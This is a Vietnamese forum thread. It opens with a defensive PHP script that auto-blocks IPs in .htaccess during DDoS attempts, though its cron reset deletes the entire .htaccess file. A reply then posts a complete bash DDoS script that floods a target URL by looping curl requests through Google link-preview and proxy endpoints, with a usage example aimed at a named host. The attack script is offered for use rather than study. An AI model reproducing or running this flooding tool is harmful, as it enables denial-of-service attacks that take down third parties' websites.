Default Code tự động lock ip khi bị ddos attack

iLoVeU

Moderator
Default Code tự động lock ip khi bị ddos attack
Code này mình tìm trên mạng và edit lại đôi chút. Hum nay post chia sẻ cho anh em. Có gì sai sót đừng chém em nhá

PHP Code:
PHP:
<? $n = 5; // Chặn ip nếu 5 lần nhanh và liên tiếp truy cập vào 1 URL
$ban = strpos($_SERVER['REQUEST_URI'], "vbshout.php")?0:1;
$in = "\n".$_SERVER['REMOTE_ADDR']." - ".$_SERVER['REQUEST_URI'];
$log = fopen('banip.log','a'); fwrite($log, $in); fclose($log);
$list = file('banip.log',FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$last = count($list) - 1;
if($last >1000) { $in = "Deny from all"."\n";
$lock = fopen('.htaccess','a'); fwrite($lock, $in); fclose($lock); }
elseif($last > $n) { for($i = 1; $i < $n; $i++) if($list[$last - $i] != $list[$last]) $ban = 0;
} else { $ban = 0; }
if($ban) { $in = "Deny from ".$_SERVER['REMOTE_ADDR']."\n";
$lock = fopen('.htaccess','a'); fwrite($lock, $in); fclose($lock);}
?>
Các bạn save đoạn code trên lại thành banip.php. Sau đó up lên thư mục gốc của site.và add dòng

PHP Code:
include 'banip.php';
vào file global.php nếu xài 4rum.
Cơ chế hoạt động
khi 1 ip gửi 1 request tới site của bạn. code sẽ tạo ra 1 file log ghi lại ip đó, và url mà ip đó truy cập.
Ví dụ : 113.22.70.69 - http://mydomain.com/4rum/index.php
nếu ip 113.22.70.69 truy cập nhanh và liên tiếp 5 lần vào cùng 1 url như trên thì code sẽ lock ip 113.22.70.69 bằng cách tạo ra 1 file htaccess và ghi lệnh deny from 113.22.70.69
Đoạn code tiếp theo

PHP Code:
if($last >1000) { $in = "Deny from all"."\n";
Khi 1 ip truy cập vào site. code sẽ ghi ip đó vào 1 dòng
Sau đó sẽ đếm tổng số dòng trong file log. nếu lớn hơn 1000 dòng trong 1 thời gian nhất định (Dấu hiệu bị tấn công bonet) thì sẽ ghi vào file htaccess lệnh deny from all
Các bạn có thể lập lịch xoá file htaccess và file log theo 1 thời gian quy định bằng cron job trong cpanel của host
Code:

if(file_exists('.htaccess')) unlink('.htaccess');
if(file_exists('banip.log')) unlink('banip.log');
?>

Save đoạn code sau lại thành reset.php và up lên thư mục gốc. sau đó xài cron job để thực thi file reset.php theo 1 thời gian nhất định. Ví dụ 10 phút xoá file htaccess và file log 1 lần.

Code này chống ddos khá hiệu quả. nhưng với botnet thì thua vì khi có lệnh deny from all mặc dù apache sẽ ko kết nối đến cơ sở dữ liệu nhưng apache vẫn trả lời các request. . đó là trả về lỗi 403.
Khi apache phải trả lời hàng trăm ngàn reqest như thế các bạn biết điều gì sẽ xảy ra rùi đóa.

Các bác test thử rùi cho ý kiến nha. Em test thấy good. dùng tool tự ddos site mình. ddos đc vài giây là bị lock ip .


bài viết của jingvn9x VHC​
 

haihung

Thanh Niên Xóm
tốt đấy.Có tinh thần học hỏi.Nhưng không rành php lắm.Java thui

code php ddos attack đính kèm file
#!/bin/bash

# Bug found by #
# Simone 'R00T_ATI' Quatrini #
# Mauro 'epicfail' Gasperini #
# Site: IHTeam Security Blog #

function start {
echo "
[*] Sending `echo $2` Requests..."

for a in `seq $2`
do
id=$((RANDOM%3999999+3000000))
nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
done

echo "
[*] Still attacking `echo $urlclear`"
echo "
[*] Sleeping for 10 Seconds"
sleep 10
start url $2 urlclear
}

echo ''
echo ' 88888888ba, 88888888ba, ad88888ba '
echo ' aa 88 `"8b 88 `"8b d8" "8b '
echo ' 88 88 `8b 88 `8b Y8, '
echo 'aaaa88aaaa 88 88 88 88 ,adPPYba, `Y8aaaaa, '
echo '""""88"""" 88 88 88 88 a8" "8a `"""""8b, '
echo ' 88 88 8P 88 8P 8b d8 `8b '
echo ' "" 88 .a8P 88 .a8P "8a, ,a8" Y8a a8P '
echo ' 88888888Y"" 88888888Y"" `"YbbdP"" "Y88888P"'
echo ''

if [ "$#" -lt 2 ]; then
echo "Usage: $0 <big file> <Requests>"
echo "Example: $0 http://hungnn.webchuyennghiep.net/clamsmtp-1.10.tar.gz 1000"
echo ""

exit 0
fi

case $2 in
*[!0-9]* ) echo "$2 is not numeric" && exit 1;;
esac

echo "Attack -->" $1
match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1

url=${url//$match1/$repl1}
url=${url//$match2/$repl2}

echo ""
echo "
[*] Loop started! CTRL+C to stop"
echo ""

start url $2 urlclear
 
Bên trên